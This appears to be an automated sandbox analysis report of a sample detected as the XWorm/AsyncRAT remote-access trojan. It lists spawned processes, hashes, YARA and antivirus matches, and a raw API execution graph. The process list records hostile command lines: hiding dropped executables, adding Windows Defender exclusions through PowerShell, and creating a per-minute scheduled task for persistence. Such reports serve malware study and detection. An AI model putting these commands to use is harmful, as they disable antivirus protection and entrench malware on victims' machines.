Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe"
Imagebase: 0x7ff7a4f70000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe"
Imagebase: 0x7ff7a4f70000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\msedge.exe"
Imagebase: 0x7ff7a4f70000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "START C:\Users\user\AppData\Local\Temp\dddd.exe"
Imagebase: 0x7ff7a4f70000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 13:03:13
Start date: 20/12/2024
Path: C:\Windows\System32\attrib.exe
Wow64 process (32bit): false
Commandline: attrib +h C:\Users\user\AppData\Local\Temp\dddd.exe
Imagebase: 0x7ff7645b0000
File size: 23'040 bytes
MD5 hash: 5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    Imagebase:0x3d0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: Joe Security
                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\msedge.exe, Author: ditekSHen
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 82%, ReversingLabs
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                    Start time:13:03:13
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:attrib +h C:\Users\user\AppData\Local\Temp\msedge.exe
                                                                                                                                                                                                    Imagebase:0x7ff7645b0000
                                                                                                                                                                                                    File size:23'040 bytes
                                                                                                                                                                                                    MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\dddd.exe
                                                                                                                                                                                                    Imagebase:0x26232200000
                                                                                                                                                                                                    File size:819'200 bytes
                                                                                                                                                                                                    MD5 hash:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                    • Detection: 63%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"cmd" /c ipconfig /all
                                                                                                                                                                                                    Imagebase:0x7ff7a4f70000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                                    Start time:13:03:14
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:ipconfig /all
                                                                                                                                                                                                    Imagebase:0x7ff649180000
                                                                                                                                                                                                    File size:35'840 bytes
                                                                                                                                                                                                    MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                    Start time:13:03:19
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\msedge.exe'
                                                                                                                                                                                                    Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

Target ID: 21
Start time: 13:03:19
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 13:03:28
Start date: 20/12/2024
Path: C:\Windows\System32\WerFault.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WerFault.exe -u -p 6476 -s 2224
Imagebase: 0x7ff6938d0000
File size: 570'736 bytes
MD5 hash: FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 13:03:29
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 13:03:29
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 13:03:43
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\System User.exe'
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 31
Start time: 13:03:43
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 34
Start time: 13:04:01
Start date: 20/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User.exe'
Imagebase: 0x7ff6cb6b0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 35
Start time: 13:04:01
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 13:04:28
Start date: 20/12/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
Imagebase: 0x7ff7c6980000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 13:04:28
Start date: 20/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 38
Start time: 13:04:29
Start date: 20/12/2024
Path: C:\Users\user\AppData\Roaming\System User.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\System User.exe"
Imagebase: 0xc40000
File size: 83'968 bytes
MD5 hash: A3B7B97F81C08C56A79971799B793072
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\System User.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 82%, ReversingLabs
Has exited: true

                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                    Start time:13:04:38
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xaf0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                    Start time:13:04:46
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xdb0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                    Start time:13:05:01
                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\System User.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\System User.exe"
                                                                                                                                                                                                    Imagebase:0xba0000
                                                                                                                                                                                                    File size:83'968 bytes
                                                                                                                                                                                                    MD5 hash:A3B7B97F81C08C56A79971799B793072
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true


Execution Graph

Execution Coverage: 8.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 14.9%
Total number of Nodes: 2000
Total number of Limit Nodes: 31
                                                                                                                                                                                                      execution_graph 18875 7ff7ff595480 18876 7ff7ff59548b 18875->18876 18884 7ff7ff59f314 18876->18884 18897 7ff7ff5a0348 EnterCriticalSection 18884->18897 20370 7ff7ff59f9fc 20371 7ff7ff59fbee 20370->20371 20373 7ff7ff59fa3e _isindst 20370->20373 20372 7ff7ff594f78 _set_fmode 11 API calls 20371->20372 20390 7ff7ff59fbde 20372->20390 20373->20371 20376 7ff7ff59fabe _isindst 20373->20376 20374 7ff7ff58c5c0 _log10_special 8 API calls 20375 7ff7ff59fc09 20374->20375 20391 7ff7ff5a6204 20376->20391 20381 7ff7ff59fc1a 20383 7ff7ff59a970 _isindst 17 API calls 20381->20383 20384 7ff7ff59fc2e 20383->20384 20388 7ff7ff59fb1b 20388->20390 20416 7ff7ff5a6248 20388->20416 20390->20374 20392 7ff7ff59fadc 20391->20392 20393 7ff7ff5a6213 20391->20393 20398 7ff7ff5a5608 20392->20398 20423 7ff7ff5a0348 EnterCriticalSection 20393->20423 20399 7ff7ff5a5611 20398->20399 20400 7ff7ff59faf1 20398->20400 20401 7ff7ff594f78 _set_fmode 11 API calls 20399->20401 20400->20381 20404 7ff7ff5a5638 20400->20404 20402 7ff7ff5a5616 20401->20402 20403 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20402->20403 20403->20400 20405 7ff7ff5a5641 20404->20405 20406 7ff7ff59fb02 20404->20406 20407 7ff7ff594f78 _set_fmode 11 API calls 20405->20407 20406->20381 20410 7ff7ff5a5668 20406->20410 20408 7ff7ff5a5646 20407->20408 20409 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20408->20409 20409->20406 20411 7ff7ff5a5671 20410->20411 20412 7ff7ff59fb13 20410->20412 20413 7ff7ff594f78 _set_fmode 11 API calls 20411->20413 20412->20381 20412->20388 20414 7ff7ff5a5676 20413->20414 20415 7ff7ff59a950 _invalid_parameter_noinfo 37 API calls 20414->20415 20415->20412 20424 7ff7ff5a0348 EnterCriticalSection 20416->20424 18929 7ff7ff5a7c90 18932 7ff7ff5a2660 18929->18932 18933 7ff7ff5a26b2 18932->18933 18934 
7ff7ff5a266d 18932->18934 18938 7ff7ff59b294 18934->18938 18939 7ff7ff59b2c0 FlsSetValue 18938->18939 18940 7ff7ff59b2a5 FlsGetValue 18938->18940 18941 7ff7ff59b2b2 18939->18941 18943 7ff7ff59b2cd 18939->18943 18940->18941 18942 7ff7ff59b2ba 18940->18942 18944 7ff7ff59b2b8 18941->18944 18945 7ff7ff59a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18941->18945 18942->18939 18946 7ff7ff59ec08 _set_fmode 11 API calls 18943->18946 18958 7ff7ff5a2334 18944->18958 18947 7ff7ff59b335 18945->18947 18948 7ff7ff59b2dc 18946->18948 18949 7ff7ff59b2fa FlsSetValue 18948->18949 18950 7ff7ff59b2ea FlsSetValue 18948->18950 18951 7ff7ff59b306 FlsSetValue 18949->18951 18952 7ff7ff59b318 18949->18952 18953 7ff7ff59b2f3 18950->18953 18951->18953 18955 7ff7ff59af64 _set_fmode 11 API calls 18952->18955 18954 7ff7ff59a9b8 __free_lconv_num 11 API calls 18953->18954 18954->18941 18956 7ff7ff59b320 18955->18956 18957 7ff7ff59a9b8 __free_lconv_num 11 API calls 18956->18957 18957->18944 18981 7ff7ff5a25a4 18958->18981 18960 7ff7ff5a2369 18996 7ff7ff5a2034 18960->18996 18963 7ff7ff5a2386 18963->18933 18964 7ff7ff59d66c _fread_nolock 12 API calls 18965 7ff7ff5a2397 18964->18965 18966 7ff7ff5a239f 18965->18966 18968 7ff7ff5a23ae 18965->18968 18967 7ff7ff59a9b8 __free_lconv_num 11 API calls 18966->18967 18967->18963 18968->18968 19003 7ff7ff5a26dc 18968->19003 18971 7ff7ff5a24aa 18972 7ff7ff594f78 _set_fmode 11 API calls 18971->18972 18974 7ff7ff5a24af 18972->18974 18973 7ff7ff5a2505 18976 7ff7ff5a256c 18973->18976 19014 7ff7ff5a1e64 18973->19014 18977 7ff7ff59a9b8 __free_lconv_num 11 API calls 18974->18977 18975 7ff7ff5a24c4 18975->18973 18978 7ff7ff59a9b8 __free_lconv_num 11 API calls 18975->18978 18980 7ff7ff59a9b8 __free_lconv_num 11 API calls 18976->18980 18977->18963 18978->18973 18980->18963 18982 7ff7ff5a25c7 18981->18982 18983 7ff7ff5a25d1 18982->18983 19029 7ff7ff5a0348 EnterCriticalSection 18982->19029 18987 7ff7ff5a2643 18983->18987 18988 7ff7ff59a574 
__FrameHandler3::FrameUnwindToEmptyState 45 API calls 18983->18988 18987->18960 18990 7ff7ff5a265b 18988->18990 18991 7ff7ff5a26b2 18990->18991 18993 7ff7ff59b294 50 API calls 18990->18993 18991->18960 18994 7ff7ff5a269c 18993->18994 18995 7ff7ff5a2334 65 API calls 18994->18995 18995->18991 18997 7ff7ff594fbc 45 API calls 18996->18997 18998 7ff7ff5a2048 18997->18998 18999 7ff7ff5a2054 GetOEMCP 18998->18999 19000 7ff7ff5a2066 18998->19000 19001 7ff7ff5a207b 18999->19001 19000->19001 19002 7ff7ff5a206b GetACP 19000->19002 19001->18963 19001->18964 19002->19001 19004 7ff7ff5a2034 47 API calls 19003->19004 19005 7ff7ff5a2709 19004->19005 19007 7ff7ff5a2746 IsValidCodePage 19005->19007 19008 7ff7ff5a285f 19005->19008 19013 7ff7ff5a2760 __scrt_get_show_window_mode 19005->19013 19006 7ff7ff58c5c0 _log10_special 8 API calls 19009 7ff7ff5a24a1 19006->19009 19007->19008 19010 7ff7ff5a2757 19007->19010 19008->19006 19009->18971 19009->18975 19011 7ff7ff5a2786 GetCPInfo 19010->19011 19010->19013 19011->19008 19011->19013 19030 7ff7ff5a214c 19013->19030 19096 7ff7ff5a0348 EnterCriticalSection 19014->19096 19031 7ff7ff5a2189 GetCPInfo 19030->19031 19040 7ff7ff5a227f 19030->19040 19036 7ff7ff5a219c 19031->19036 19031->19040 19032 7ff7ff58c5c0 _log10_special 8 API calls 19033 7ff7ff5a231e 19032->19033 19033->19008 19034 7ff7ff5a2eb0 48 API calls 19035 7ff7ff5a2213 19034->19035 19041 7ff7ff5a7bf4 19035->19041 19036->19034 19039 7ff7ff5a7bf4 54 API calls 19039->19040 19040->19032 19042 7ff7ff594fbc 45 API calls 19041->19042 19043 7ff7ff5a7c19 19042->19043 19046 7ff7ff5a78c0 19043->19046 19047 7ff7ff5a7901 19046->19047 19048 7ff7ff59f910 _fread_nolock MultiByteToWideChar 19047->19048 19051 7ff7ff5a794b 19048->19051 19049 7ff7ff5a7bc9 19050 7ff7ff58c5c0 _log10_special 8 API calls 19049->19050 19052 7ff7ff5a2246 19050->19052 19051->19049 19053 7ff7ff59d66c _fread_nolock 12 API calls 19051->19053 19055 7ff7ff5a7983 19051->19055 19067 7ff7ff5a7a81 19051->19067 19052->19039 19053->19055 
19054 7ff7ff59a9b8 __free_lconv_num 11 API calls 19054->19049 19056 7ff7ff59f910 _fread_nolock MultiByteToWideChar 19055->19056 19055->19067 19057 7ff7ff5a79f6 19056->19057 19057->19067 19077 7ff7ff59f154 19057->19077 19060 7ff7ff5a7a92 19062 7ff7ff59d66c _fread_nolock 12 API calls 19060->19062 19064 7ff7ff5a7b64 19060->19064 19066 7ff7ff5a7ab0 19060->19066 19061 7ff7ff5a7a41 19063 7ff7ff59f154 __crtLCMapStringW 6 API calls 19061->19063 19061->19067 19062->19066 19063->19067 19065 7ff7ff59a9b8 __free_lconv_num 11 API calls 19064->19065 19064->19067 19065->19067 19066->19067 19068 7ff7ff59f154 __crtLCMapStringW 6 API calls 19066->19068 19067->19049 19067->19054 19069 7ff7ff5a7b30 19068->19069 19069->19064 19070 7ff7ff5a7b50 19069->19070 19071 7ff7ff5a7b66 19069->19071 19072 7ff7ff5a0858 WideCharToMultiByte 19070->19072 19073 7ff7ff5a0858 WideCharToMultiByte 19071->19073 19074 7ff7ff5a7b5e 19072->19074 19073->19074 19074->19064 19075 7ff7ff5a7b7e 19074->19075 19075->19067 19076 7ff7ff59a9b8 __free_lconv_num 11 API calls 19075->19076 19076->19067 19083 7ff7ff59ed80 19077->19083 19081 7ff7ff59f203 LCMapStringW 19082 7ff7ff59f19a 19081->19082 19082->19060 19082->19061 19082->19067 19084 7ff7ff59eddd 19083->19084 19091 7ff7ff59edd8 __vcrt_FlsAlloc 19083->19091 19084->19082 19093 7ff7ff59f240 19084->19093 19085 7ff7ff59ee0d LoadLibraryExW 19087 7ff7ff59eee2 19085->19087 19088 7ff7ff59ee32 GetLastError 19085->19088 19086 7ff7ff59ef02 GetProcAddress 19086->19084 19090 7ff7ff59ef13 19086->19090 19087->19086 19089 7ff7ff59eef9 FreeLibrary 19087->19089 19088->19091 19089->19086 19090->19084 19091->19084 19091->19085 19091->19086 19092 7ff7ff59ee6c LoadLibraryExW 19091->19092 19092->19087 19092->19091 19094 7ff7ff59ed80 __crtLCMapStringW 5 API calls 19093->19094 19095 7ff7ff59f26e __crtLCMapStringW 19094->19095 19095->19081 19751 7ff7ff59c590 19762 7ff7ff5a0348 EnterCriticalSection 19751->19762 20438 7ff7ff5aadd9 20441 7ff7ff5954e8 LeaveCriticalSection 20438->20441 19106 
